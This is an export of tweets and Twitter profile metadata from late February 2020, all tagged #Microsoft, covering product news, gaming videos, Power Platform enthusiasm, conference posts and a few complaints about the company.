    <t>{'id': 1147063490189959168, 'id_str': '1147063490189959168', 'name': "Turmentic's Tips", 'screen_name': 'turmentic', 'location': 'North Carolina, USA', 'description': 'A collection of videos and articles to help you when you play your favorite games', 'url': 'https://t.co/9x60GboBM0', 'entities': {'url': {'urls': [{'url': 'https://t.co/9x60GboBM0', 'expanded_url': 'https://www.youtube.com/user/wizard465', 'display_url': 'youtube.com/user/wizard465', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 74, 'friends_count': 107, 'listed_count': 1, 'created_at': 'Fri Jul 05 08:43:42 +0000 2019', 'favourites_count': 984, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 786, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1196154116373983242/PFIZdmoW_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1196154116373983242/PFIZdmoW_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1147063490189959168/1563257915',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</si>
  <si>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05:43:12 +0000 2020</t>
  </si>
  <si>
    <t>hey kids in the #Microsoft industry... stop showing everyone your collector cards... you are behaving like my 12yo and his obsession with #FIFA #Cards now, or #Pokemon before #Examhunters https://t.co/BIZh711ziB</t>
  </si>
  <si>
    <t>{'id': 16243671, 'id_str': '16243671', 'name': 'J Tobias Strandh', 'screen_name': 'aljapaco', 'location': 'Sweden', 'description': 'Leadership, Digitization, Agile Methods &amp; Education, Father of six great kids and fan of @bkhackenofcl, @FCBayern, @LFC #NuffSaid ðŸâš½ï¸ðŸ’»ðŸ‡¸ðŸ‡ª', 'url': 'https://t.co/hE5Sgg2H2W', 'entities': {'url': {'urls': [{'url': 'https://t.co/hE5Sgg2H2W', 'expanded_url': 'http://www.aljapaco.nu', 'display_url': 'aljapaco.nu', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 698, 'friends_count': 315, 'listed_count': 59, 'created_at': 'Thu Sep 11 17:07:16 +0000 2008', 'favourites_count': 6265, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 17029,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'http://pbs.twimg.com/profile_images/1233431950947422209/UXCugIPR_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233431950947422209/UXCugIPR_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/16243671/1582908069', 'profile_link_color': '91D2FA', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'EBE5DD', 'profile_text_color': '57514C', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Sat Feb 29 05:41:50 +0000 2020</t>
  </si>
  <si>
    <t>#powerplatform will do wonders for any organisation who are ready to adapt it. Lucky to be with #ey. 
#powerplatformbootcamp organised by #microsoft is the reason that made me think and achieve this.
The saying is real - your #creativity is the limit!
#DigitalTransformation</t>
  </si>
  <si>
    <t>{'id': 105383049, 'id_str': '105383049', 'name': 'Solomon Robert', 'screen_name': 'iamrobi24', 'location': 'Chennai', 'description': '#DataGeek #PowerBI #PowerApps #PowerAutomate #CSPO  Drummer. @ChennaiIPL CSKian. Ardent fan of Dr. @Jharrisjayaraj. Music Lover. Crazy for cars. #Badminton', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 218, 'friends_count': 484, 'listed_count': 3, 'created_at': 'Sat Jan 16 05:23:32 +0000 2010', 'favourites_count': 5328, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4176, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '490A3D', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme4/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1216355705659129857/2J8QXovF_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1216355705659129857/2J8QXovF_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/105383049/1543570532', 'profile_link_color': 'E97F02', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'F8CA00', 'profile_text_color': 'BD1550', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Sat Feb 29 05:40:51 +0000 2020</t>
  </si>
  <si>
    <t>Just Posted A Brand New Video On YouTube!
Please Watch It And Maybe Subscribe
(Link In Bio)
#clips
#video
#gamer
#gaming
#games
#game
#happy
#smile
#goodvibes
#fun
#fortnite
#fortnitegame
#xbox
#microsoft
#fortnitebr
#fortnitebattleroyale https://t.co/7hrmbDkCiq</t>
  </si>
  <si>
    <t>Sat Feb 29 05:40:27 +0000 2020</t>
  </si>
  <si>
    <t>The #pope has joined forces with #Microsoft and #IBM to create a doctrine for #ethicalAI and facial recognition. Here's how the #Vatican wants to shape #AI. 
@businessinsider V/@PawlowskiMario #AIEthics #Artificialintelligence #EmergingTech #tech #AIethix
https://t.co/YlynVbbZ2V</t>
  </si>
  <si>
    <t>{'id': 968008274003005440, 'id_str': '968008274003005440', 'name': 'Mario Pawlowski', 'screen_name': 'PawlowskiMario', 'location': 'Chicago IL', 'description': 'CEO @iTrucker_ #Enterpreneur #SMM #Chef #Dreamer passion for #AI #Future #SupplyChain #Science #AIEthics #Tech #Food #History #Footballâš½ï¸ ðŸ‡µðŸ‡±ðŸ‡ºðŸ‡¸ðŸ‡ªðŸ‡º', 'url': 'https://t.co/EF9lWTDlmu', 'entities': {'url': {'urls': [{'url': 'https://t.co/EF9lWTDlmu', 'expanded_url': 'https://itrucker.com', 'display_url': 'itrucker.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 7445, 'friends_count': 5943, 'listed_count': 52, 'created_at': 'Mon Feb 26 06:22:12 +0000 2018', 'favourites_count': 18465, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5683, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1235847748802375680/dtB9LH_T_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235847748802375680/dtB9LH_T_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/968008274003005440/1581299873',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</si>
  <si>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05:38:37 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft #Forms + #SharePoint List + #PowerAutomate + #PowerBI produces mind-blowing results that was a dream. 
Figured out the way to make all of them work together to produce some stunning output. Should implement this solution across 10-15 areas. 
#MissionAccomplished</t>
  </si>
  <si>
    <t>Sat Feb 29 05:32:02 +0000 2020</t>
  </si>
  <si>
    <t>With the @devengers
#Docker #dockerevents #Microsoft
#Hyderabad</t>
  </si>
  <si>
    <t>{'id': 172687071, 'id_str': '172687071', 'name': 'Nithin Saji Thomas', 'screen_name': 'nithnz', 'location': 'Trivandrum, India', 'description': 'Digital Marketer | Engineer', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 37, 'friends_count': 66, 'listed_count': 6, 'created_at': 'Fri Jul 30 09:53:18 +0000 2010', 'favourites_count': 6, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 18,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'http://pbs.twimg.com/profile_images/887979618287763457/V9qIlvz3_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/887979618287763457/V9qIlvz3_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/172687071/1512586284', 'profile_link_color': '1B95E0',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</si>
  <si>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Sat Feb 29 05:30:13 +0000 2020</t>
  </si>
  <si>
    <t>Defense in depth -- the #Microsoft way (part 62): #Windows shipped with end-of-life components https://t.co/dlti2L2eke #FullDisclosure</t>
  </si>
  <si>
    <t>Sat Feb 29 05:28:47 +0000 2020</t>
  </si>
  <si>
    <t>Getting Old and Getting Evil Fable 2 Part 7 https://t.co/EsolZLPKnc
#fable #fable2 #microsoft #xbox #xbox360 #xboxone #dnd #westworld #wotc #twitch #streamer #stream #live #videogame #rpg #gamer</t>
  </si>
  <si>
    <t>{'id': 1429320728, 'id_str': '1429320728', 'name': 'Tyler Sylvester', 'screen_name': 'slaught3rkitty', 'location': '', 'description': 'Just a gamer and a general nerd. I like rpgs of the video game and table top variety. Come check me out on twitch, link in bio.', 'url': 'https://t.co/JL1o01cSnO', 'entities': {'url': {'urls': [{'url': 'https://t.co/JL1o01cSnO', 'expanded_url': 'http://linktr.ee/slaughterkitty', 'display_url': 'linktr.ee/slaughterkitty', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 22, 'friends_count': 91, 'listed_count': 0, 'created_at': 'Wed May 15 02:12:18 +0000 2013', 'favourites_count': 231, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 622,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'http://pbs.twimg.com/profile_images/1180032479991869442/lsjUOhBB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1180032479991869442/lsjUOhBB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1429320728/1389468571',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</si>
  <si>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05:28:39 +0000 2020</t>
  </si>
  <si>
    <t>Announcing general availability for the Azure Security Center for IoT:https://t.co/arJ80eCxSq
For our services call us at :+97143210808/+971559468090
Get Our Services here : https://t.co/jTyXCxN0qH
#Microsoft #Azure #IOT #Availability #Security #Center #Microexcel #UAE https://t.co/9vy9kgGtZF</t>
  </si>
  <si>
    <t>Sat Feb 29 05:28:07 +0000 2020</t>
  </si>
  <si>
    <t>Learn Advanced Excel tricks, tips, functions and formulas in this excel course.
#edubull #excel #word #microsoftexcel #ngIndia2020 #microsoft #powerpoint #motivation  #windows #SaturdayThoughts #SaturdayMotivation #SaturdayMorning #SaturdayVibes  #courseexcel #GodMorningSaturday https://t.co/rAi86yblgO</t>
  </si>
  <si>
    <t>{'id': 1078243921489063936, 'id_str': '1078243921489063936', 'name': 'Edubull-App', 'screen_name': 'EdubullApp', 'location': 'New Delhi, India', 'description': '#Edubull is an online #education platform which thrives on making education accessible to anyone, anytime and anywhere.', 'url': 'https://t.co/eMQrGQacGo', 'entities': {'url': {'urls': [{'url': 'https://t.co/eMQrGQacGo', 'expanded_url': 'https://www.edubull.com/', 'display_url': 'edubull.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 51, 'friends_count': 73, 'listed_count': 0, 'created_at': 'Thu Dec 27 10:59:18 +0000 2018', 'favourites_count': 117, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 251,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'http://pbs.twimg.com/profile_images/1227556313363668992/TDdh3QXK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1227556313363668992/TDdh3QXK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1078243921489063936/1583297351',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</si>
  <si>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05:23:03 +0000 2020</t>
  </si>
  <si>
    <t>Check out my new laptop #surfacebook2 thanks @surface . MUSIC BY: YUI YAMAGUCHI SHE SHARE STORY (FOR VLOG) . #microsoft #microsoftsurface #hololens2 #ar #mr #cgi #vfx #computervision #imagination #neverstoplearning #realtime #digitalcreator #immersiveart... https://t.co/dPAPP2sdxC</t>
  </si>
  <si>
    <t>{'id': 2514217585, 'id_str': '2514217585', 'name': 'Don Allen III', 'screen_name': 'DonAllenIII', 'location': 'Los Angeles, CA', 'description': 'ðŸŽ¬ Teacher at DreamWorks #Animation âœï¸ Digital CreatorðŸ‘¨\u200dðŸ’» #VFX #CGI #AR #VR #illustrator', 'url': 'https://t.co/d7g3vSncxb', 'entities': {'url': {'urls': [{'url': 'https://t.co/d7g3vSncxb', 'expanded_url': 'http://www.instagram.com/donalleniii', 'display_url': 'instagram.com/donalleniii', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 342, 'friends_count': 340, 'listed_count': 15, 'created_at': 'Thu May 22 02:02:48 +0000 2014', 'favourites_count': 338, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 818,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'http://pbs.twimg.com/profile_images/932763850461429760/MndUkHxw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/932763850461429760/MndUkHxw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2514217585/1511223208', 'profile_link_color': 'E81C4F',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</si>
  <si>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Sat Feb 29 05:21:33 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft will remove Cortana from its... https://t.co/RyiOZPw0VH #engadget</t>
  </si>
  <si>
    <t>{'id': 1316862031, 'id_str': '1316862031', 'name': 'ð”“ð”¦ð”¬ð”±ð”¯ ð”‡ð”¶ð”Ÿð”¦ð”¢ð” ', 'screen_name': 'pidybi', 'location': '', 'description': 'ðŸ™‰ðŸ™ˆðŸ™Š', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 508, 'friends_count': 397, 'listed_count': 280, 'created_at': 'Sat Mar 30 17:25:49 +0000 2013', 'favourites_count': 55, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 543864, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': True, 'profile_background_color': '7E8284', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/857877374444109825/0La9C91v_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/857877374444109825/0La9C91v_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1316862031/1462972099', 'profile_link_color': '3679CE',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'regular'}</t>
  </si>
  <si>
    <t>Sat Feb 29 05:20:39 +0000 2020</t>
  </si>
  <si>
    <t>Announcing general availability for the Azure Security Center for IoT:https://t.co/vBEirI6ytV
For our services call us at :+97143210808/+971559468090
Get Our Services here : https://t.co/RYTKCFgKCt
#Microsoft #Azure #IOT #Availability #Security #Center #Microexcel #UAE https://t.co/iwnQNMZKLT</t>
  </si>
  <si>
    <t>{'id': 427462497, 'id_str': '427462497', 'name': 'sukesh govindan', 'screen_name': 'sukeshgovindan', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 64, 'friends_count': 392, 'listed_count': 21, 'created_at': 'Sat Dec 03 15:18:18 +0000 2011', 'favourites_count': 25, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 326,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'http://pbs.twimg.com/profile_images/1073960472968351744/fFQpvqlr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1073960472968351744/fFQpvqlr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/427462497/1474291266',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</si>
  <si>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05:18:51 +0000 2020</t>
  </si>
  <si>
    <t>#OpenSUSE News Outsourced to #Microsoft , Dominique Leuenberger's Report on #Tumbleweed
 https://t.co/GvclbCDnyF #suse #deletegithub</t>
  </si>
  <si>
    <t>Sat Feb 29 05:18:06 +0000 2020</t>
  </si>
  <si>
    <t>The boys are in town! #D365S #2020Summit #Dynamics #PowerPlatform #PowerApps #PowerAutomate #Microsoft #MSDyn365 @iPropertyCloud @TechLabsLondon https://t.co/hMcVCcZ94E</t>
  </si>
  <si>
    <t>{'id': 463800419, 'id_str': '463800419', 'name': 'Matt Hedges', 'screen_name': 'CustServiceMatt', 'location': 'High Wycombe, England', 'description': 'Senior Business Consultant @TechLabsLondon ðŸ‘Š Dynamics365 &amp; Business Transformation ðŸ‘@iPropertyCloud â¤ï¸ Swindon Town FC #RealFootballFan - views all my own', 'url': 'https://t.co/j7faKzCdAb', 'entities': {'url': {'urls': [{'url': 'https://t.co/j7faKzCdAb', 'expanded_url': 'http://www.techlabs.london', 'display_url': 'techlabs.london', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 749, 'friends_count': 560, 'listed_count': 24, 'created_at': 'Sat Jan 14 14:00:48 +0000 2012', 'favourites_count': 1253, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2146,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'http://pbs.twimg.com/profile_images/1200840978451574784/Pk_3aXvS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1200840978451574784/Pk_3aXvS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/463800419/1538825503', 'profile_link_color': '0084B4',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</si>
  <si>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Sat Feb 29 05:09:33 +0000 2020</t>
  </si>
  <si>
    <t>My native school Head principle #MrShingade sir join #Microsoft community.. He completed @MicrosoftTeams course and earn #MIE badge.. Now, 10 teacher's staff ready to fly  Enjoying selfie @MicrosoftEDU #Road2E2 @MeenakshiUberoi @AnthonySalcito @sdelafosse @DePedagogics https://t.co/poj6RWgCWL</t>
  </si>
  <si>
    <t>{'id': 880079558485180416, 'id_str': '880079558485180416', 'name': 'Supriya ShivgundeðŸ‡®ðŸ‡³ ðŸ‘‰@E2ðŸ‡¦ðŸ‡ºðŸ˜ŽðŸ˜ðŸ’šðŸ¨', 'screen_name': 'supershivgunde', 'location': 'Solapur, India', 'description': 'Primary Government School Teacher, Microsoft Innovative Educator Expert (#MIEE), Student Voice Ambassador (#SVA),\nMinecraft Mentor, \n#Wakelet Ambassador ðŸ˜Š', 'url': 'https://t.co/mGtpWxlj6n', 'entities': {'url': {'urls': [{'url': 'https://t.co/mGtpWxlj6n', 'expanded_url': 'https://www.youtube.com/channel/UCI7_m_PCeP-oD46K65gdjgQ', 'display_url': 'youtube.com/channel/UCI7_mâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 825, 'friends_count': 1445, 'listed_count': 9, 'created_at': 'Wed Jun 28 15:04:52 +0000 2017', 'favourites_count': 1702, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1203, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1233775497714241536/xVpFSEgr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1233775497714241536/xVpFSEgr_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/880079558485180416/1582431704',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</si>
  <si>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05:09:08 +0000 2020</t>
  </si>
  <si>
    <t>4 Tips for working from home with Microsoft Teams by Lola Jacobson https://t.co/1Lyg2TpSTY #Microsoft</t>
  </si>
  <si>
    <t>Sat Feb 29 05:06:23 +0000 2020</t>
  </si>
  <si>
    <t>I heard that millions of computers are infected with Cortana, that new virus from China.  #Microsoft #COVID2019</t>
  </si>
  <si>
    <t>{'id': 30873364, 'id_str': '30873364', 'name': 'Dan Tomaszewski', 'screen_name': 'dantski', 'location': '', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 160, 'friends_count': 367, 'listed_count': 5, 'created_at': 'Mon Apr 13 14:24:26 +0000 2009', 'favourites_count': 777, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 703,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'http://pbs.twimg.com/profile_images/3605602603/c382a59faf74814520018ac8e9901c10_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/3605602603/c382a59faf74814520018ac8e9901c10_normal.jpeg',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</si>
  <si>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05:05:56 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft being Microsoft, according to #microsoftTim https://t.co/ClbJEwJkEo 
 #monopoly #proprietarysoftware #scam</t>
  </si>
  <si>
    <t>Sat Feb 29 05:05:01 +0000 2020</t>
  </si>
  <si>
    <t>#Azure Cost Management + Billing updates  February 2020 https://t.co/i4JmB5fg9o #cloud #microsoft</t>
  </si>
  <si>
    <t>Sat Feb 29 05:03:18 +0000 2020</t>
  </si>
  <si>
    <t>#opensuse News  outsourced to #microsoft !!!!!
"openSUSE News has moved from being a Wordpress application to a Jekyll static site developed directly on Github"
#deletegithub #suse #proprietarysoftware (deleted:) https://t.co/oZhG9xtHrJ</t>
  </si>
  <si>
    <t>Sat Feb 29 04:58:06 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft will remove Cortana from its Android launcher in April https://t.co/akuaNvuQRJ #Microsoft</t>
  </si>
  <si>
    <t>Sat Feb 29 04:56:18 +0000 2020</t>
  </si>
  <si>
    <t>Delivered a session on the topic "UI UX is essential for the success of any product" at SRM ramapuram on the occasion of Microsoft Student partner Open Day 2020 as a Microsoft Student partner.
#microsoft #MSPartner #MSP 
#uiux #community https://t.co/jrfZtBMNSI</t>
  </si>
  <si>
    <t>{'id': 3152388860, 'id_str': '3152388860', 'name': 'R.Manoj Aiyer', 'screen_name': 'manojgrows', 'location': 'Coimbatore', 'description': 'I am a highly active and passionate guy who loves trending technologies and wants to help others learn and use them to solve real-life problems.', 'url': 'https://t.co/rY2d5X1i1i', 'entities': {'url': {'urls': [{'url': 'https://t.co/rY2d5X1i1i', 'expanded_url': 'http://rmanoj.tech', 'display_url': 'rmanoj.tech', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 7, 'friends_count': 74, 'listed_count': 0, 'created_at': 'Mon Apr 13 06:47:05 +0000 2015', 'favourites_count': 23, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1212615220469698562/WZz2hGhL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1212615220469698562/WZz2hGhL_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3152388860/1577945088',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</si>
  <si>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04:52:18 +0000 2020</t>
  </si>
  <si>
    <t>Cloud for all. Great article and what a fantastic business. For the love of dog. #azure #microsoft #powerbi #ilovedogs https://t.co/kq1Ahedw6Z</t>
  </si>
  <si>
    <t>Sat Feb 29 04:52:08 +0000 2020</t>
  </si>
  <si>
    <t>New Insider Risk Management &amp;amp; new features to Azure Sentinal - check out Microsoft's 6 key announcements from #RSAC - one of the world's largest global security conferences
#Security #Microsoft #CIO @msftsecurity https://t.co/13PjrO39w7</t>
  </si>
  <si>
    <t>{'id': 22146146, 'id_str': '22146146', 'name': 'Rob Quickenden', 'screen_name': 'rquickenden', 'location': 'London. United Kingdom', 'description': 'Chief Strategy Officer @Cisilion | Husband | Dad to 2 boys | #Microsoft WI #MVP | #Evangelist |Views are my own', 'url': 'https://t.co/WYtS9PngR5', 'entities': {'url': {'urls': [{'url': 'https://t.co/WYtS9PngR5', 'expanded_url': 'https://robquickenden.blog', 'display_url': 'robquickenden.blog', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 874, 'friends_count': 1320, 'listed_count': 177, 'created_at': 'Fri Feb 27 14:46:34 +0000 2009', 'favourites_count': 2873, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6579,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'http://pbs.twimg.com/profile_images/1121066009400573952/cYPmT5n9_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1121066009400573952/cYPmT5n9_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/22146146/1580931014',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</si>
  <si>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Sat Feb 29 04:50:47 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve">   
@DRoses patented handles &amp;amp; late floater gives the @DetroitPistons the win over the @Suns - Gotta love it!
#DetroitBasketball #MVP #DROSE #GOAT #NBA #POOH 
#KARMAPAYMENTPLAN 
#theSNIPEdiary #theHATdiary
#2K #2KCOMMUNITY #2K20 #MyTEAM #MICROSOFT #XBOX #JWengerART https://t.co/UlcHrBVbCl</t>
  </si>
  <si>
    <t>Sat Feb 29 04:48:24 +0000 2020</t>
  </si>
  <si>
    <t>Were here! Looking forward to a great day #D365S #2020Summit #Dynamics #PowerPlatform #PowerApps #PowerAutomate #Microsoft #MSDyn365 @iPropertyCloud @TechLabsLondon https://t.co/NXbartuUkp</t>
  </si>
  <si>
    <t>Sat Feb 29 04:47:15 +0000 2020</t>
  </si>
  <si>
    <t>The future is here!! #quantumcomputing go #microsoft 
https://t.co/N1cStqV12o https://t.co/Ul91WDaHiH</t>
  </si>
  <si>
    <t>Sat Feb 29 04:44:25 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Says it Isn't Giving up on the VR Side of Windows Mixed Reality https://t.co/QNouv5gjip
#microsoft #vr #ar #mr</t>
  </si>
  <si>
    <t>{'id': 905032656697475075, 'id_str': '905032656697475075', 'name': '42Interactive', 'screen_name': '42Interactive', 'location': 'Australia', 'description': 'Award-Winning Design and Creative Technology  - Digital Specialists in Experiential | VR | AR | MR | Immersive Content &amp; Development', 'url': 'https://t.co/HJzifluSYH', 'entities': {'url': {'urls': [{'url': 'https://t.co/HJzifluSYH', 'expanded_url': 'http://42interactive.com', 'display_url': '42interactive.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 92, 'friends_count': 257, 'listed_count': 17, 'created_at': 'Tue Sep 05 11:39:34 +0000 2017', 'favourites_count': 209, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 837,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'http://pbs.twimg.com/profile_images/983599431810347009/aCL0Hs0f_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/983599431810347009/aCL0Hs0f_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/905032656697475075/1553055053',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</si>
  <si>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04:42:16 +0000 2020</t>
  </si>
  <si>
    <t>Sat Feb 29 04:38:42 +0000 2020</t>
  </si>
  <si>
    <t>Micro assets being created on @Algorand  #tesla #apple #Microsoft check them on the @purestakeco Algorand explorer 
https://t.co/N5HnW45UOD https://t.co/UnqDyq9liM</t>
  </si>
  <si>
    <t>{'id': 64669085, 'id_str': '64669085', 'name': 'Bilal', 'screen_name': 'bilal_brahim', 'location': 'Canberra, Australian Capital T', 'description': 'Philosopher. blockchain enthusiast. artist.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 323, 'friends_count': 1169, 'listed_count': 5, 'created_at': 'Tue Aug 11 09:11:29 +0000 2009', 'favourites_count': 1199, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 818,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'http://pbs.twimg.com/profile_images/784399761801486337/9cP1MT5m_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/784399761801486337/9cP1MT5m_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/64669085/1475850426',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</si>
  <si>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Sat Feb 29 04:37:53 +0000 2020</t>
  </si>
  <si>
    <t>Off to Seattle for the first time time to visit the mothership #microsoft https://t.co/ImcMyimeLc</t>
  </si>
  <si>
    <t>{'id': 845991938, 'id_str': '845991938', 'name': 'Birgitte S. Steen', 'screen_name': 'BeeSteen90', 'location': 'Oslo', 'description': "Microsoft 365 and security specialist. â€œSomeone told me â€œDress for the job you wantâ€ Now I'm sitting in a disciplinary hearing dressed as catwoman.â€", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 87, 'friends_count': 289, 'listed_count': 7, 'created_at': 'Tue Sep 25 18:16:51 +0000 2012', 'favourites_count': 40, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1179111546443718657/HEXql7uL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1179111546443718657/HEXql7uL_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/845991938/1569957075',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</si>
  <si>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04:33:56 +0000 2020</t>
  </si>
  <si>
    <t>@0x0ddc0ffee @sskras One of my first jobs as a college student in the mid 90s was writing #FORTRAN 77 on #OpenVMS. I had access to a #Microsoft Fortran compiler too so that I could work disconnected from the terminal server. I like FORTRAN more than Python with all of its silly whitespace formatting.</t>
  </si>
  <si>
    <t>{'id': 338125838, 'id_str': '338125838', 'name': 'JK', 'screen_name': 'SpamYoghurt1JK', 'location': 'North America', 'description': 'Programmer Analyst', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 33, 'friends_count': 618, 'listed_count': 1, 'created_at': 'Tue Jul 19 03:35:23 +0000 2011', 'favourites_count': 2462, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 448,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'http://pbs.twimg.com/profile_images/1191210232648781824/DBBB8aMf_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1191210232648781824/DBBB8aMf_normal.jpg',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</si>
  <si>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04:30:03 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft will remove Cortana from its Android launcher in April https://t.co/qJhwIwWvMo via @GeekTech_App #geektech #technewsapp  #Microsoft</t>
  </si>
  <si>
